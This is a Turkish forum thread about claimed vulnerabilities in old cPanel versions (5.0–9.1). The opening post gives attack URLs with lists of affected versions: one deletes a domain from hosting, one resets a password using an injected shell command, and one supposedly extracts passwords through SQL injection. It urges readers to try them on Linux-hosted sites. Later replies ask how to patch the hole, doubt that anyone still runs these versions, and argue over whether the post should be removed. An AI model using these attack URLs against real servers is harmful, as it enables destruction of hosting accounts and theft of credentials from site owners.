Cpanel Hack Bu Doğru Olabilirmi?

Question

Eger bir sitede cpanel yönetim arayüzü tespit ederseniz bu adresle hostingten domaini silersiniz.

Kod:
http://www.siteadi.com:2086/scripts...?domain=(domain) &user=(user)&submit-domain=Terminate

Uygun sürümler:
cPanel cPanel 5.0
cPanel cPanel 5.3
cPanel cPanel 6.0
cPanel cPanel 6.2
cPanel cPanel 6.4
cPanel cPanel 6.4.1
cPanel cPanel 6.4.2 .STABLE_48
cPanel cPanel 6.4.2
cPanel cPanel 7.0
cPanel cPanel 8.0
cPanel cPanel 9.0
cPanel cPanel 9.1 .0-R85
cPanel cPanel 9.1

---------------------

Cpanel sifresini email dogrulamasi gerektirmeden direk sifirlar.

http://www.siteadi.com:2082/resetpass/?user=|">ls"|

Uygun Sürümler:
cPanel cPanel 5.0
cPanel cPanel 5.3
cPanel cPanel 6.0
cPanel cPanel 6.2
cPanel cPanel 6.4
cPanel cPanel 6.4.1
cPanel cPanel 6.4.2 .STABLE_48
cPanel cPanel 6.4.2
cPanel cPanel 7.0
cPanel cPanel 8.0
cPanel cPanel 9.0
cPanel cPanel 9.1

----------------------------

Bir sistemde cpanel sql injection ile sifreleri alabilirsiniz:

http://www.siteadi.com:2086/scripts/passwd?password=<> &domain=<>&user=<>

Uygun Sürümler:
cPanel cPanel 5.0
cPanel cPanel 5.3
cPanel cPanel 6.0
cPanel cPanel 6.2
cPanel cPanel 6.4
cPanel cPanel 6.4.1
cPanel cPanel 6.4.2 .STABLE_48
cPanel cPanel 6.4.2
cPanel cPanel 7.0
cPanel cPanel 8.0
cPanel cPanel 9.0
cPanel cPanel 9.1 .0-R85
cPanel cPanel 9.1

CPanel kullanilan sitelerde oluyor bu açik;
Simdi diyeceksin Bir sitenin kontrol panelinin Cpanel oldugunu nereden anlarim,
Söyliyim,Bir sitenin Kontrol paneli ya Plesk Panel dir yada Cpanel panel,
bunu sen anlayamassin ama genelde web mastarlarin tercihi Cpaneldir,Kolay oldugu için tabi
Genelde Linux serverde kurulu oluyor.Yani Linux server kullanan siteler üzerinde deneyin.
Alıntı:Siber Warrior
------------------
Böle bişi varsa nasıl bu açığı kapatabiliriz

Dr.Wave · Answer

bu sürümleri kullanan varmı ki.

Black1 · Answer

bunları burda vermek sizce ne kadar mantıklı
ben kaldırılmasını ıstıyorum

wdp · Answer

öle demeyin incelemek lazım ki ona göre önlem alalım...

bu yöntemler işe yarıyormu bilen warmı?

HQoTB · Answer

Kaynak sanırım Cyber-Warrior Information Technology's World ama bu sürümleri gerçekten kullanan yok.

testere · Answer

bu başlık silinecektir sanırım. öyle incelemek gerekiyorsa gvenlik bölümü oluşturulur, burası da hack forumuna döner. ben lamerlerin isimlerine bile tahammül edemezken adi sitelerinin isimlerini görmeyi istemiyorum. gitsinler *belerinin cpanelleriyle uğraşsınlar.

HQoTB · Answer

testere adlı üyeden alıntı:						mesajı görüntüle									bu başlık silinecektir sanırım. öyle incelemek gerekiyorsa gvenlik bölümü oluşturulur, burası da hack forumuna döner. ben lamerlerin isimlerine bile tahammül edemezken adi sitelerinin isimlerini görmeyi istemiyorum. gitsinler *belerinin cpanelleriyle uğraşsınlar. 		Hack değil sanırım bilgilendirilme yapılmışta senin sinirine gidiyor diye kendimizi bi düzene sokamayız. Hem ona buna layer diyip durma. Boş ver takılma sen.

Dr.Wave · Answer

ya Allah aşkına bu forumdaki kimler bu sürümü kullanıyor.

Elazığlı168 · Answer

bu konu çok konuşuldu yaw

testere · Answer

HQoTB adlı üyeden alıntı:						mesajı görüntüle									Hack değil sanırım bilgilendirilme yapılmışta senin sinirine gidiyor diye kendimizi bi düzene sokamayız. Hem ona buna layer diyip durma. Boş ver takılma sen. 		kendi sitesi dışındaki sitelerin zararına uğraşan herkes lamerdir.aslında başka sıfatları var da, buraya yazılmıyor. ayrıca öyle emir cümlelerinden de hoşlanmam.kendine sakla.